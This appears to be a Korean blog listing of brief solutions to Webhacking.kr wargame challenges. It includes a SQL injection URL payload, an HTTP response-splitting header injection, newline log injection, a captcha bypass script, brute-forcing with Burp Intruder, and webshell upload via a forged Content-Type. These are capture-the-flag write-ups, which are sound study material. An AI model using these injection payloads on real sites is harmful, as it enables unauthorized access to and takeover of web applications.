본문 바로가기

Hacking

(65)
Webhacking.kr 20 20번 lv5frm.id.value="userid";lv5frm.cmt.value="hi"; lv5frm.hack.value=lv5frm.attackme.value; // captcha의 문자를 바로 hack변수에 저장하여 Submit 할 수 있다. lv5frm.submit();
Webhacking.kr 27 $q=@mysql_fetch_array(mysql_query("select id from challenge27_table where id='guest' and no=($_GET[no])")) or die("query error"); if($q[id]=="guest") echo("guest");if($q[id]=="admin") @solve(); 소스는 위와 같다. 32)+OR+no+like+1%20--%20http://webhacking.kr/challenge/web/web-12/index.php?no=32)%20or%20no%20like%202%20--%20 no id 2 admin 1 guest
Webhacking.kr 56 이유없는 기능은 없을것이다. 검색창이 존재하므로 문자를 입력해본다.hi를 검색하였을때 hi~가 검색되는것으로 보아, like "%입력값%"으로 쿼리가 구성되어 있을 것으로 추정된다. 검색어 _______을 검색해보았을때 admin의 글이 나오는 것으로 보아 비밀글의 내용은 7자리임을 추정할 수 있다. Burpsuite Intruder기능을 통해 브루트포싱 해보니k______로 정답이 좁혀지고 인간러닝을 통해 kk.php임을 추측 할 수 있었다.
Webhacking.kr 58 원래 Sothink Decomplier등의 SWF디컴파일러로 디컴 해야하나, 단순한 문제라서 strings로도 볼 수 있었다. http://webhacking.kr/challenge/web/web-35/g1v2m2passw0rd.php 해당 링크로 접속하면 문제 풀림 !W
Webhacking.kr 43 Header의 Contents-type 변조를 통해 다른 파일 형태로 웹쉘을 업로드 하면 된다.
Webhacking.kr 38 adminss\n127.0.0.1:admin\n1.1.1.1:admin
webhacking.kr 11 정규식 문제 정규식 패턴에 대한 이해가 필요하다. [1-3][a-f]{5}_.*1.1.1.1.*\tp\ta\ts\ts http://webhacking.kr/challenge/codeing/code2.html?val=1aaaaa_1.1.1.1.%09p%09a%09s%09s
Webhacking.kr 52 http://webhacking.kr/challenge/web/web-27/?id=userid%0dSet-Cookie:%20id=userid Header Injection HTTP Response Splitting 기법으로 위와같이 헤더를 삽입 할 수 있다.